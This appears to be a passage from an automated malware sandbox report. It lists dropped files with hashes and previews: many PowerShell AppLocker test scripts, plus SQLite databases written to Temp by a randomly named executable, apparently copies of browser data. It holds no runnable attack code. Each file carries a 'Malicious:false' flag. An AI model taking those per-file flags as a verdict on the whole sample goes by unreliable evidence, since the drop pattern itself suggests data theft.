                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_350p11lp.zhr.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4e0wdpmj.tjm.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4jfwhozq.s1v.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aricztu0.q1l.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fsmvelot.23s.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_grih5ibv.mfd.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i2lw2ojv.tck.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lszaq003.103.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mpkj33ec.ozm.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mwcj452o.0ej.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_opdclvzj.b1x.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pkzr0vuz.1au.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_srk4mdps.fdn.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ubttqbhs.rym.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vvefelv0.uln.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xcsvh3wg.g3h.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zhzlzsge.cnd.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\aKuJX3NHBr

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):106496
                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\ajpIxoeCOU

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):25
                                                                                                Entropy (8bit):4.323856189774723
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:LVKzVrNS90O:LIRrA90O
                                                                                                MD5:94D71328B4FADE0B7066F12E9384F293
                                                                                                SHA1:EB5852968E1ECF9ED1C3979B4461371D0C73AC85
                                                                                                SHA-256:23C1132515A29C4242A094E4425910CB6DE2861507CA3B812840417D983E5CCE
                                                                                                SHA-512:305F5F16A8FF8B171D4EC3B1F17D29FE562D77D85BA45074119639EB021B70F352BF8697D6B36C930A7210D087E434C3720F9F8DB7D07F9D48459B41B6C038FE
                                                                                                Malicious:false
                                                                                                Preview:YXO04E84IU7LCflfM6uh7XrAk

                                                                                                C:\Users\user\AppData\Local\Temp\b3bIWKvbXC

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):40960
                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\bNWT1bKiit

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):40960
                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\c9euxVHrQn

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):106496
                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\cBsJONMnuY

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):49152
                                                                                                Entropy (8bit):0.8180424350137764
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\cF1uLLQbdb

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):106496
                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\cXTbPPtTxN

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):20480
                                                                                                Entropy (8bit):0.5712781801655107
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\cqQpvzTyYk

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):106496
                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\cwsARjzqVh

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):126976
                                                                                                Entropy (8bit):0.47147045728725767
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
